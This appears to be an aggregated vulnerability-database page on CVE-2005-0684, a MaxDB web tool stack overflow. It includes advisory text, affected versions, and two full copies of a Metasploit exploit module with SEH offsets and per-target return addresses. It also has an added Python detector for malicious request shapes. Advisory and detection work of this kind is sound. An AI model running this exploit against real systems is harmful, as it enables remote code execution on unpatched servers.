CVE-2005-0684
CVSS 10.0
Published: 2005-04-25 00:00:00
Revised: 2011-03-07 21:20:26

[Original] Multiple buffer overflows in the web tool for MySQL MaxDB before 7.5.00.26 allow remote attackers to execute arbitrary code via (1) an HTTP GET request with a long file parameter after a percent ("%") sign or (2) a long Lock-Token string to the WebDAV functionality, which is not properly handled by the getLockTokenHeader function in WDVHandler_CommonUtils.c.


[CNNVD] MySQL MaxDB HTTP GET Request Remote Buffer Overflow Vulnerability (CNNVD-200504-094)

        MySQL's MaxDB is an enhanced version of SAP DB, the open-source database from SAP AG, and complements the MySQL database server.
        MaxDB contains a buffer overflow vulnerability in its handling of requests on the HTTP interface; a remote attacker may exploit it to execute arbitrary instructions on the system.
        The vulnerability is caused by improper handling of HTTP GET requests that contain a percent sign (%). If an attacker can issue an HTTP GET request that specifies a percent sign followed by an overly long string as the file parameter, a stack overflow may occur. The attacker must send roughly 4000 bytes to overwrite the process's SEH. The attacker may also be able to overwrite the saved instruction pointer.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:mysql:maxdb:7.5.00.12  MySQL MaxDB 7.5.00.12
cpe:/a:mysql:maxdb:7.5.00.08  MySQL MaxDB 7.5.00.08
cpe:/a:mysql:maxdb:7.5.00.18  MySQL MaxDB 7.5.00.18
cpe:/a:mysql:maxdb:7.5.00.19  MySQL MaxDB 7.5.00.19
cpe:/a:mysql:maxdb:7.5.00.15  MySQL MaxDB 7.5.00.15
cpe:/a:mysql:maxdb:7.5.00     MySQL MaxDB 7.5.00
cpe:/a:mysql:maxdb:7.5.00.14  MySQL MaxDB 7.5.00.14
cpe:/a:mysql:maxdb:7.5.00.23  MySQL MaxDB 7.5.00.23
cpe:/a:mysql:maxdb:7.5.00.16  MySQL MaxDB 7.5.00.16
cpe:/a:mysql:maxdb:7.5.00.11  MySQL MaxDB 7.5.00.11

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0684
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0684
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-094
(official data source) CNNVD

- Other links and resources

http://www.idefense.com/application/poi/display?id=235&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050425 MySQL MaxDB Webtool Remote Lock-Token Stack Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050425 MySQL MaxDB Webtool Remote Stack Overflow Vulnerability
http://dev.mysql.com/doc/maxdb/changes/changes_7.5.00.26.html#WebDAV
(VENDOR_ADVISORY)  CONFIRM  http://dev.mysql.com/doc/maxdb/changes/changes_7.5.00.26.html#WebDAV
http://www.securityfocus.com/bid/13368
(UNKNOWN)  BID  13368

- Vulnerability information

MySQL MaxDB HTTP GET Request Remote Buffer Overflow Vulnerability
Critical  Buffer overflow
2005-04-25 00:00:00  2006-03-28 00:00:00
Remote
        (Description identical to the CNNVD entry above.)

- Advisories and patches

        No data

- Vulnerability information (16791)

MaxDB WebDBM GET Buffer Overflow (EDBID:16791)
windows remote
2010-05-09 Verified
9999 metasploit
N/A
##
# $Id: maxdb_webdbm_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MaxDB WebDBM GET Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the MaxDB WebDBM
				service. This service is included with many recent versions
				of the MaxDB and SAPDB products. This particular module is
				capable of exploiting Windows systems through the use of an
				SEH frame overwrite. The offset to the SEH frame may change
				depending on where MaxDB has been installed, this module
				assumes a web root path with the same length as:

				C:\Program Files\sdb\programs\web\Documents
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0684'],
					[ 'OSVDB', '15816'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
					[ 'BID', '13368'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2052,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'StackAdjustment' => -3500,
				},
				'Platform'   => 'win',
			'Targets'        =>
				[
					['MaxDB 7.5.00.11 / 7.5.00.24', { 'Ret' => 0x1002aa19 }], # wapi.dll
					['Windows 2000 English',        { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',  { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows 2003 English',        { 'Ret' => 0x7ffc0638 }], # peb magic :-)
					['Windows NT 4.0 SP4/SP5/SP6',  { 'Ret' => 0x77681799 }], # ws2help.dll
				],
			'DisclosureDate' => 'Apr 26 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(9999)
			], self.class)
	end

	def exploit
		# Trigger the SEH by writing past the end of the page after
		# the SEH is already overwritten. This avoids the other smashed
		# pointer exceptions and goes straight to the payload.
		buf = rand_text_alphanumeric(16384)
		buf[1586, payload.encoded.length] = payload.encoded
		buf[3638, 5] = "\xe9" + [-2052].pack('V')
		buf[3643, 2] = "\xeb\xf9"
		buf[3647, 4] = [target.ret].pack('V')

		print_status("Trying target address 0x%.8x..." % target.ret)

		send_request_raw({
			'uri' => '/%' + buf
		}, 5)

		handler
	end

end

- Vulnerability information (F83068)

MaxDB WebDBM GET Buffer Overflow (PacketStormID:F83068)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,web,overflow,root
windows
CVE-2005-0684

This Metasploit module exploits a stack overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an SEH frame overwrite. The offset to the SEH frame may change depending on where MaxDB has been installed; this module assumes a web root path with the same length as: C:\Program Files\sdb\programs\web\Documents

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'MaxDB WebDBM GET Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the MaxDB WebDBM
				service. This service is included with many recent versions
				of the MaxDB and SAPDB products. This particular module is
				capable of exploiting Windows systems through the use of an
				SEH frame overwrite. The offset to the SEH frame may change
				depending on where MaxDB has been installed, this module
				assumes a web root path with the same length as:

				C:\Program Files\sdb\programs\web\Documents
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0684'],
					[ 'OSVDB', '15816'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
					[ 'BID', '13368'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2052,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'StackAdjustment' => -3500,

				},
				'Platform'   => 'win',
			'Targets'        => 
				[
					['MaxDB 7.5.00.11 / 7.5.00.24', { 'Ret' => 0x1002aa19 }], # wapi.dll
					['Windows 2000 English',        { 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',  { 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows 2003 English',        { 'Ret' => 0x7ffc0638 }], # peb magic :-)
					['Windows NT 4.0 SP4/SP5/SP6',  { 'Ret' => 0x77681799 }], # ws2help.dll
				],
			'DisclosureDate' => 'Apr 26 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(9999)
			], self.class)
	end

	def exploit
		# Trigger the SEH by writing past the end of the page after
		# the SEH is already overwritten. This avoids the other smashed
		# pointer exceptions and goes straight to the payload.
		buf = rand_text_alphanumeric(16384)
		buf[1586, payload.encoded.length] = payload.encoded
		buf[3638, 5] = "\xe9" + [-2052].pack('V')
		buf[3643, 2] = "\xeb\xf9"
		buf[3647, 4] = [target.ret].pack('V')

		print_status("Trying target address 0x%.8x..." % target.ret)
		send_request_raw({
			'uri' => '/%' + buf
		}, 5)

		handler
	end

end

- Vulnerability information

OSVDB 15816
MySQL MaxDB Web Administration Service Malformed GET Request Overflow
Remote / Network Access  Input Manipulation
Loss of Integrity  Upgrade
Exploit Public, Exploit Private, Exploit Commercial  Vendor Verified

- Vulnerability description

A remote overflow exists in MySQL MaxDB. The MaxDB web administration service fails to properly handle HTTP GET requests containing a percent sign ('%') resulting in a buffer overflow. With a specially crafted HTTP GET request containing a percent sign followed by an overly long string as the file parameter, a remote attacker can cause arbitrary code execution with SYSTEM privileges resulting in a loss of integrity.
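The CNNVD and OSVDB descriptions above both describe the same request shapes: a GET whose path carries a long unencoded run directly after a percent sign (roughly 4000 bytes to reach the SEH record), and, per the MITRE text, an oversized WebDAV Lock-Token header. The following Python is an added detection example written for this page; it is not code from the page, from MySQL/SAP, or from the Metasploit module. It scans access-log lines for those two shapes from a defender's side. The log line format, the alert thresholds, and the client addresses are constructed assumptions.

```python
"""
Detection helper for the two MaxDB web tool overflow vectors described in
CVE-2005-0684 (added example; not code from the advisory or the vendor).
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List, Optional

# Thresholds are assumptions. The advisory text says roughly 4000 bytes are
# needed to reach the SEH record; alerting well below that catches probes as
# well as full attempts without flagging ordinary percent-encoded paths.
MAX_RUN_AFTER_PERCENT = 512
MAX_LOCK_TOKEN_LEN = 512

# Normal percent-encoding is "%" plus two hex digits and then a short path
# segment; a long run of bytes after "%" up to the next delimiter is what the
# vulnerable GET handler mishandles.
_PERCENT_RUN = re.compile(r"%([^%/?#&]*)")

# Constructed log format (assumption): "<client> <method> <target> <headers>"
# where <headers> is a ";"-separated list of "Name: value" pairs, or "-".
_LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")


@dataclass
class Finding:
    client: str
    vector: str   # "get-percent" or "lock-token"
    length: int   # size of the suspicious run or header value


def check_target(target: str) -> Optional[int]:
    """Length of the longest run after a '%' if it exceeds the threshold."""
    worst = max((len(m.group(1)) for m in _PERCENT_RUN.finditer(target)),
                default=0)
    return worst if worst > MAX_RUN_AFTER_PERCENT else None


def check_lock_token(headers: Dict[str, str]) -> Optional[int]:
    """Length of the Lock-Token header value if it exceeds the threshold."""
    token = headers.get("lock-token")
    if token is not None and len(token) > MAX_LOCK_TOKEN_LEN:
        return len(token)
    return None


def parse_headers(field: str) -> Dict[str, str]:
    """Parse the constructed ';'-separated header field into a dict."""
    headers: Dict[str, str] = {}
    if field.strip() == "-":
        return headers
    for pair in field.split(";"):
        name, _, value = pair.partition(":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    return headers


def scan_log(lines: Iterable[str]) -> Iterator[Finding]:
    """Yield one Finding per suspicious request in the log."""
    for line in lines:
        m = _LOG_LINE.match(line.rstrip("\n"))
        if not m:
            continue
        client, _method, target, hdr_field = m.groups()
        n = check_target(target)
        if n is not None:
            yield Finding(client, "get-percent", n)
        n = check_lock_token(parse_headers(hdr_field))
        if n is not None:
            yield Finding(client, "lock-token", n)


# Constructed sample log lines (not real traffic); two benign, two oversized.
SAMPLE_LOG = [
    "10.0.0.5 GET /webdbm/index.html -",
    "10.0.0.5 GET /docs/my%20file.html -",
    "10.0.0.9 GET /%" + "A" * 4000 + " -",
    "10.0.0.7 LOCK /docs/report.txt Lock-Token: <opaquelocktoken:abc-123>;Depth: 0",
    "10.0.0.9 LOCK /docs/report.txt Lock-Token: " + "B" * 3000,
]


def run() -> List[Finding]:
    """Scan the constructed sample log and return the findings."""
    return list(scan_log(SAMPLE_LOG))


if __name__ == "__main__":
    for f in run():
        print(f"{f.client}: {f.vector} ({f.length} bytes)")
```

Run against the constructed sample, the scan reports the two oversized requests and leaves the ordinary percent-encoded path and the short opaque lock token alone; on real logs the thresholds should be tuned to the longest legitimate URIs and WebDAV tokens the deployment actually sees.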

- Timeline

2005-04-25 2005-03-08
2005-04-27 2005-04-25

- Solution

Upgrade to version 7.5.00.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

MySQL MaxDB WebDAV Lock Token Remote Buffer Overflow Vulnerability
Boundary Condition Error  BID 13369
Yes No
2005-04-26 12:00:00 2009-07-12 02:06:00
The discoverer of this vulnerability wishes to remain anonymous.

- Affected program versions

MySQL AB MaxDB 7.5.00.25
MySQL AB MaxDB 7.5.00.24
MySQL AB MaxDB 7.5.00.23
MySQL AB MaxDB 7.5.00.19
MySQL AB MaxDB 7.5.00.18
MySQL AB MaxDB 7.5.00.16
MySQL AB MaxDB 7.5.00.15
MySQL AB MaxDB 7.5.00.14
MySQL AB MaxDB 7.5.00.12
MySQL AB MaxDB 7.5.00.11
MySQL AB MaxDB 7.5.00.08
MySQL AB MaxDB 7.5.00
MySQL AB MaxDB 7.5.00.26

- Unaffected program versions

MySQL AB MaxDB 7.5.00.26

- Vulnerability discussion

A remote buffer overflow vulnerability affects MySQL MaxDB. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Solution

The vendor has released an upgrade dealing with this issue.

Upgrades are available for the following versions:
MySQL AB MaxDB 7.5.00.18
MySQL AB MaxDB 7.5.00.08
MySQL AB MaxDB 7.5.00.25
MySQL AB MaxDB 7.5.00.12
MySQL AB MaxDB 7.5.00.16
MySQL AB MaxDB 7.5.00.23
MySQL AB MaxDB 7.5.00.19
MySQL AB MaxDB 7.5.00.24
MySQL AB MaxDB 7.5.00.14
MySQL AB MaxDB 7.5.00.11
MySQL AB MaxDB 7.5.00.15
MySQL AB MaxDB 7.5.00

- Related references
